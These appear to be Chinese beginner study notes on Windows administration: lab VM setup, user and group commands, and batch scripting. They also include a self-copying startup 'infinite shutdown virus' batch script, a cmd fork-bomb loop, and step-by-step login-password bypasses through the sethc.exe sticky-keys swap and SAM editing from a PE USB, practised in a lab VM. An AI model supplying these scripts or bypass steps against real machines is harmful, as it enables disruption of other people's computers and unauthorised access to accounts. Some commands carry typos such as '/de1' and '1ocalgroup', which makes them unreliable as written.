1. 部署win7虚拟机
-
新建文件夹,给win7建立一个虚拟家目录
-
下载好win7镜像,msdn提供下载
-
新建虚拟机,并将内存改为512m或1G,插入下载好的镜像
-
开机,安装系统
-
安装vm tools,重启
-
关闭防火墙
-
关闭自动更新
-
调出桌面图标
-
关机,做快照
2. 用户与组管理
用户对应着当前使用电脑的身份,不同的身份有着不同的权限。
2.1 服务器版本介绍
windows服务器系统:win2000 win2003 win2008 win2012
其中win2000市面上基本上没有用的啦,win2012和win2008功能差不多,只是桌面不一样
linux服务器系统:Redhat Centos
2.2 用户描述
-
每一个用户登录系统后,拥有不同的操作权限
-
每一个用户有自己唯一的SID(安全标识符)
-
用户SID: S-1-5-21-426206823-2579496042-14852678-500
-
系统SID: S-1-5-21-426206823-2579496042-14852671
windows系统管理员administrator的UID是500 普通用户的UID是1000开始
-
不同的账户拥有不同的权限,为不同的账户赋权限,也就是为不用账户的SID赋权限
-
查看用户: whoami
-
查看SID值: whoami /user
-
账户密码存储位置: c:\windows\system32\config\SAM #暴力破解/撞库
-
windows系统上,默认密码最长有效期42天
2.3 内置账户
-
给人使用的账户:
- Administrator #管理员账户
- guest #来宾账户
-
计算机服务组件相关的系统账号
- system #系统账户==权限至高无上
- local services #本地服务账户==权限等于普通用户
- network services #网络服务账户==权限等于普通用户
注意: 内置账号是不能删除的
2.4 配置文件
每个用户都有自己的配置文件(家目录),在用户第一次登录
时自动产生,路径是:
win7/win2008 c:\用户
xp/win2003 c:\Documents and Settings\
2.5 用户管理命令
net user # 查看用户列表
net user 用户名 密码 # 改密码
net user 用户名 密码 /add # 创建一个新用户
net user 用户名 /de1 # 删除一个用户
net user 用户名 /active:yes/no # 激活或禁用账户
练习;
1、练习图形及命令行中,进行用户管理(包括创建、修改密码、删除用户、登录并验证家目录产生、及权限)
2、制作一个批处理脚本,可以实现互动创建用户!
无限关机病毒最终版
@echo off
copy mm.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup"
# 启动项路径最终版
# win7/win10都是这个路径,userprofile --> 当前用户配置文件的路径
shutdown -s -f -t 0
2.6 组管理
组的作用: 简化权限的赋予。
赋权限方式:
- 用户 ---> 组 ---> 赋权限
- 用户 ---> 赋权限
2.6.1 内置组
内置组的权限默认已经被系统赋予。
1) administrators #管理员组
2) guests #来宾组
3) users #普通用户组,默认新建用户都属于该组
4) network #网络配置组
5) print #打印机组
6) Remote Desktop #远程桌面组
2.6.2 组管理命令
net localgroup #查看组列表
net 1ocalgroup 组名 #查看该组的成员
net 1ocalgroup 组名 /add #创建一个新的组
net 1ocalgroup 组名 用户名 /add #添加用户到组
net 1ocalgroup 组名 用户名 /del #从组中踢出用户
net 1ocalgroup 组名 /del #删除组
练习:
1、练习图形及命令行中,进行组管理(创建组、组成员添加、查看组成员、成员脱离组、删除组)
2、创建1个普通用户1isi,并将1isi提升为管理员,并验证lisi是否成功取得管理员权限!
3. win7/win10破解开机密码
1、在未登录系统时,连续按5次shift键, 弹出程序C:\windows\system32\sethc.exe
2、部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名!
注:如win7或win10系统已修补漏洞2,则无法利用
3.1 破解过程相关知识
- cmd工具路径
C: windows\system32\cmd
2、用户/账户密码存储位置
c:\windows\system32\config\SAM
#非逆转型加密、使用hash值类似的方法、MD5 SHA
- 修改账户密码:
net user 用户名 新密码
3.2 漏洞利用过程
案例:破解win7系统密码
实验步骤:
1、开启win7虚拟机,开机,并设置一个复杂密码:
2、关机,并开机,在出现windows启动界面时强制关机;
3、再开机,出现“启动修复(推荐)”及选择该项: #如为出现,多尝试儿次第2步,如还不行,请换其他方法
4、出现系统还原提示,点击取消,等待几分钟后,会出现问题原因,点击查看详细信息:
5、打开最后一个链接即一个记事本:
6、记事本中点打开,并选择显示所有文件:
7、找到sethc并改名sethc-bak,再找到cmd, 复制一份cmd改名为sethc
8、全部关闭,重启。
9、系统启动完毕后,连续按5次shift键,将弹出cmd工具,使用命令net user 用户名 新密码,将当前用户密码修改掉即可,或者另外建立1个用户,并提升为管理员,注销后,可再删除新建的用户,这样的好处为不修改当前用户的密码即可登录系统。
4. 冒号和goto的用法
: 用来划分区块
goto 用来跳转
如果你有编程基础, 你可以理解成是定义函数, 以及调用函数
编写一个有菜单选择的批处理文件:
@echo off
color 0a
title mn小程序
:menu
cls
echo ==================================
echo 1.定时关机
echo 2.蓝屏炸弹
echo 3.创建用户
echo 4.退出程序
echo ==================================
set /p num=请输入你的选择:
if "%num%"=="1" goto a
if "%num%"=="2" goto b
if "%num%"=="3" goto c
if "%num%"=="4" goto d
echo 他妈的,不看序号的吗?傻逼,乱输入,看清楚点.
pause
goto menu
:a
set /p time=请输入关机倒计时(单位:秒,时间不能大于1000):
shutdown -s -f -t %time%
goto menu
:b
echo 我是蓝屏炸弹
goto menu
:c
set /p user=请输入用户名:
set /p pwd=请输入密码:
net user %user% %pwd% /add
echo 用户%user%已经创建成功!
pause
goto menu
:d
exit
# 无限打开cmd,暴力破坏电脑
:a
start cmd
goto a
5. 破解登录密码
-
假装忘记密码!
-
第一步: 准备一个空U盘(记着备份u盘中的数据)
-
第二步: 准备一个PE系统制作工具(新与18可以破解的系统版本不一样)链接
- xp pe/win 7 pe/win10pe (老毛桃,大白菜,U深度)
- PE系统: 微型维修系统, 将PE系统安装到U盘中,虚拟机的话是一个ISO文件
-
第三步: 插入U盘,并运行pe软件,然后点击一键安装! 此时u盘就变成了pe启动盘
-
第四步: 将U盘插入要破解密码的电脑设备上!
-
第五步:开机,马上立即赶紧狂按E2或者F1或者esc,进入bios ( 虚拟机直接进入固件 ), 去修改启动顺序!
-
第六步:开机,进入PE系统,此时你也可以看见一个桌面,桌面上一般有一个篡改SAM文件的工具,运行这个工具,并打开sam文件,直接修改密码!
-
第七步:拔掉U盘 ( 虚拟机是把两个连接取消 ), 重启电脑